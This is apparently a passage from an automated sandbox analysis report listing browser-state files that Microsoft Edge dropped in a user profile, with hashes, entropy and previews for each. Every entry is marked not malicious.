C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	694
Entropy (8bit):	3.557038516410029
Encrypted:	false
SSDEEP:	12:Wlc8NOuuuuuuuuuuuuuuuuuuuuumllhI1U8NV:iDglhIlV
MD5:	ACCFABD127DD2F71D0B6AD12FC8B549D
SHA1:	33AE795BD804F9DC33A89098E4400CD4B44FBB08
SHA-256:	E0435C397E2ED2F5D2BAE64ECDCAEB671435862E05B197A6A6379D0BDEF33657
SHA-512:	4E5921E932963AC0FCAEA9C261C9EB036C076841E363E35849E3EA9FFCF7A5F2CB6CC34C35FFA4C5FA373E73AC4A2E53DE3739620C2B9E421915F098EA85AE2E
Malicious:	false
Preview:	A..r.................20_1_1...1.,U.................20_1_1...1..}0................39_config..........6.....n ....1u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............u}.=...............4...;...............#38_h.......6.Z..W.F.....T......T...........V.e................V.e..................:.0................39_config..........6.....n ....1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.210735190237996
Encrypted:	false
SSDEEP:	6:HAXQtiUhIq2P923oH+TcwtfrK+IFUt8YAXQtPZmw+YAXQtdkwO923oH+TcwtfrUQ:gAt3Cv4Yeb23FUt87AtP/+7Atd5LYeb5
MD5:	08FFC4F904D90C0B0EB307EA549F7448
SHA1:	727BE0AF1080043587F8FCAA25E3C32CD70CF1BF
SHA-256:	8ACA7B2FDD71727F9722A25D174A04848AC7F9FF9109F3BF32AC820E5E794549
SHA-512:	6B0950720392546B1B1C2A8C41617F60728FC5C50B0A16353D6272F7E7EC7709A0966245559CD59E08F4677BD0FE954F239C07D40F7419C4DDD8A36FCFF05B71
Malicious:	false
Preview:	2024/11/25-05:33:54.627 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/25-05:33:54.634 1e54 Recovering log #3.2024/11/25-05:33:54.634 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.210735190237996
Encrypted:	false
SSDEEP:	6:HAXQtiUhIq2P923oH+TcwtfrK+IFUt8YAXQtPZmw+YAXQtdkwO923oH+TcwtfrUQ:gAt3Cv4Yeb23FUt87AtP/+7Atd5LYeb5
MD5:	08FFC4F904D90C0B0EB307EA549F7448
SHA1:	727BE0AF1080043587F8FCAA25E3C32CD70CF1BF
SHA-256:	8ACA7B2FDD71727F9722A25D174A04848AC7F9FF9109F3BF32AC820E5E794549
SHA-512:	6B0950720392546B1B1C2A8C41617F60728FC5C50B0A16353D6272F7E7EC7709A0966245559CD59E08F4677BD0FE954F239C07D40F7419C4DDD8A36FCFF05B71
Malicious:	false
Preview:	2024/11/25-05:33:54.627 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/11/25-05:33:54.634 1e54 Recovering log #3.2024/11/25-05:33:54.634 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	787
Entropy (8bit):	4.059252238767438
Encrypted:	false
SSDEEP:	12:G0nYUtTNop//z3p/Uz0RuWlJhC+lvBavRtin01zvZDEtlkyBrgxvB1ys:G0nYUtypD3RUovhC+lvBOL+t3IvB8s
MD5:	D8D8899761F621B63AD5ED6DF46D22FE
SHA1:	23E6A39058AB3C1DEADC0AF2E0FFD0D84BB7F1BE
SHA-256:	A5E0A78EE981FB767509F26021E1FA3C506F4E86860946CAC1DC4107EB3B3813
SHA-512:	4F89F556138C0CF24D3D890717EB82067C5269063C84229E93F203A22028782902FA48FB0154F53E06339F2FDBE35A985CE728235EA429D8D157090D25F15A4E
Malicious:	false
Preview:	.h.6.................__global... .t...................__global... .9..b.................33_..........................33_........v.................21_.....vuNX.................21_.....<...................20_.....,.1..................19_.....QL.s.................18_.....<.J\|.................37_...... .A.................38_..........................39_........].................20_.....Owa..................20_.....`..N.................19_.....D8.X.................18_......`...................37_..........................38_......\e..................39_.....dz.\|.................9_.....'\c..................9_.......f-.................__global... .\|.&R.................__global... ./....................__global... ..T...................__global... ...G..................__global... .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.182555169986368
Encrypted:	false
SSDEEP:	6:HAXQtWZEOq2P923oH+TcwtfrzAdIFUt8YAXQtWZEXZmw+YAXQtakwO923oH+Tcwc:gAt3Ov4Yeb9FUt87At3X/+7Ata5LYebS
MD5:	F0A14639280D22B27571C2DD06F54C5A
SHA1:	75D8C549E05287BC8915E8889E91C5BA7A804B97
SHA-256:	105AA30FA7F0D242744C5925135F6A592344B7CCE82ADA2BF9367F00F9F39BAF
SHA-512:	C0D5893AC172A16924806B001BE5702529342E21DCF2D5DF6105C3C1CDD28864762E1029FEE392671C7220C7694D4E3B0F788A41184B443C50B7FB8DF0D89DF2
Malicious:	false
Preview:	2024/11/25-05:33:54.623 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/25-05:33:54.623 1e54 Recovering log #3.2024/11/25-05:33:54.624 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.182555169986368
Encrypted:	false
SSDEEP:	6:HAXQtWZEOq2P923oH+TcwtfrzAdIFUt8YAXQtWZEXZmw+YAXQtakwO923oH+Tcwc:gAt3Ov4Yeb9FUt87At3X/+7Ata5LYebS
MD5:	F0A14639280D22B27571C2DD06F54C5A
SHA1:	75D8C549E05287BC8915E8889E91C5BA7A804B97
SHA-256:	105AA30FA7F0D242744C5925135F6A592344B7CCE82ADA2BF9367F00F9F39BAF
SHA-512:	C0D5893AC172A16924806B001BE5702529342E21DCF2D5DF6105C3C1CDD28864762E1029FEE392671C7220C7694D4E3B0F788A41184B443C50B7FB8DF0D89DF2
Malicious:	false
Preview:	2024/11/25-05:33:54.623 1e54 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/25-05:33:54.623 1e54 Recovering log #3.2024/11/25-05:33:54.624 1e54 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.0907333777376556
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMDwuF9hDO6vP6O+0tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEP6Ftbz8hu3VlXr4CRo1
MD5:	C0461D18550444E38DC4701ACAA915E8
SHA1:	662BEEC4E25CA422791AC22758C9AEA10D553652
SHA-256:	EDB384573BD2B520B19FE4A9DBE1D38AFB550863EDF16522FAD08BB874492C84
SHA-512:	F98D13321684CE2FF63549DFE168FE2D8EAFA569857DE877AAE7D1C9F8D519654BF33DA27D8E404ACC4EB983BC91C7EBDA38553A92273D1FB832BE153C2F6506
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3fbe5.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.0907333777376556
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMDwuF9hDO6vP6O+0tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEP6Ftbz8hu3VlXr4CRo1
MD5:	C0461D18550444E38DC4701ACAA915E8
SHA1:	662BEEC4E25CA422791AC22758C9AEA10D553652
SHA-256:	EDB384573BD2B520B19FE4A9DBE1D38AFB550863EDF16522FAD08BB874492C84
SHA-512:	F98D13321684CE2FF63549DFE168FE2D8EAFA569857DE877AAE7D1C9F8D519654BF33DA27D8E404ACC4EB983BC91C7EBDA38553A92273D1FB832BE153C2F6506
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3fc05.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.0907333777376556
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMDwuF9hDO6vP6O+0tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEP6Ftbz8hu3VlXr4CRo1
MD5:	C0461D18550444E38DC4701ACAA915E8
SHA1:	662BEEC4E25CA422791AC22758C9AEA10D553652
SHA-256:	EDB384573BD2B520B19FE4A9DBE1D38AFB550863EDF16522FAD08BB874492C84
SHA-512:	F98D13321684CE2FF63549DFE168FE2D8EAFA569857DE877AAE7D1C9F8D519654BF33DA27D8E404ACC4EB983BC91C7EBDA38553A92273D1FB832BE153C2F6506
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3fdca.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.0907333777376556
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMDwuF9hDO6vP6O+0tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEP6Ftbz8hu3VlXr4CRo1
MD5:	C0461D18550444E38DC4701ACAA915E8
SHA1:	662BEEC4E25CA422791AC22758C9AEA10D553652
SHA-256:	EDB384573BD2B520B19FE4A9DBE1D38AFB550863EDF16522FAD08BB874492C84
SHA-512:	F98D13321684CE2FF63549DFE168FE2D8EAFA569857DE877AAE7D1C9F8D519654BF33DA27D8E404ACC4EB983BC91C7EBDA38553A92273D1FB832BE153C2F6506
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4247c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.0907333777376556
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMDwuF9hDO6vP6O+0tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEP6Ftbz8hu3VlXr4CRo1
MD5:	C0461D18550444E38DC4701ACAA915E8
SHA1:	662BEEC4E25CA422791AC22758C9AEA10D553652
SHA-256:	EDB384573BD2B520B19FE4A9DBE1D38AFB550863EDF16522FAD08BB874492C84
SHA-512:	F98D13321684CE2FF63549DFE168FE2D8EAFA569857DE877AAE7D1C9F8D519654BF33DA27D8E404ACC4EB983BC91C7EBDA38553A92273D1FB832BE153C2F6506
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF46955.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.0907333777376556
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMDwuF9hDO6vP6O+0tbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEP6Ftbz8hu3VlXr4CRo1
MD5:	C0461D18550444E38DC4701ACAA915E8
SHA1:	662BEEC4E25CA422791AC22758C9AEA10D553652
SHA-256:	EDB384573BD2B520B19FE4A9DBE1D38AFB550863EDF16522FAD08BB874492C84
SHA-512:	F98D13321684CE2FF63549DFE168FE2D8EAFA569857DE877AAE7D1C9F8D519654BF33DA27D8E404ACC4EB983BC91C7EBDA38553A92273D1FB832BE153C2F6506
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
SHA-512:	94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
Malicious:	false
Preview:	edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	130439
Entropy (8bit):	3.80180718117079
Encrypted:	false
SSDEEP:	1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
MD5:	EB75CEFFE37E6DF9C171EE8380439EDA
SHA1:	F00119BA869133D64E4F7F0181161BD47968FA23
SHA-256:	48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
